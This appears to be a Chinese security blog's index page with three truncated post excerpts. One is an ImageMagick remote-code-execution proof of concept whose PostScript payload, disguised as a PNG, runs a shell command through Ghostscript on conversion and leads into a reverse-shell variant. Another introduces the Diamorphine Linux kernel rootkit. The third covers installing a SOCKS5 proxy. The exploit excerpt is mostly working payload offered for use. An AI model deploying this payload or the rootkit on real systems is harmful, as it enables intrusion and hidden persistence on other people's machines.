imagemagic RCE PoC

系统自定义 Web安全与渗透

1.下列内容保存为png,即可(touch 1.png &&vi 1.png) 之后执行convert 1.png 1.gif 之后你就会看到,执行了 >$ id (如果ubuntu测试的时候没有,可以手动安装imagemagic  —-> apt install imagemagick   %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%id) currentdevice putdeviceprops 如果需要nc反弹可以输入如下:   %!PS userdict /setpagedevice […]

查看全部

Ubuntu或Centos下一键安装socks5代理脚本

系统自定义 小折腾/小配置

很多时候ss并不能很好的解决特殊问题。 直入主题: 下载脚本: wget —no-check-certificate https://raw.github.com/Lozy/danted/master/install.sh -O install.sh 安装: chmod +x install.sh && ./install.sh –port=端口 –user=自己设置用户名 –passwd=设置密码   安装成功 成功后会出现:Dante Server Install Successfuly! 用的是dente-server ubuntu可以直接apt install dente-server,但是配置文件需要手动修改。这个只是为了方便   具体更多用法输入:/etc/init.d/sockd Usage: […]

查看全部

rootkit LKM之 “Diamorphine”

系统自定义 Rootkit

序:这个标题但愿不会被天朝给Kill掉—- 善哉。   一:基础姿势了解一下 好久没认真写点东西了,来讲一讲rootkit中最受欢迎的一种LKM(loadable Kernel module  能加载的内核模块),说白了,就是编译一个模块,然后用命令insmod 将指定的模块加载到内核中,Linux有些功能是以模块的方式存在的,在需要使用时才载入kernel的。好处是kernel轻装上阵,即需要什么拿什么。这类模块一般都是设备驱动程序。 二:“Diamorphine”使用 Diamorphine是Linux Kernels 2.6.x / 3.x / 4.x的可加载模块。 下面测试基于4.4-kernel的ubuntu Diamorphine git地址 —-传送门 git下来后make 使用说明: 1.make安装完之后加载模块,还必须以root权限运行 […]

查看全部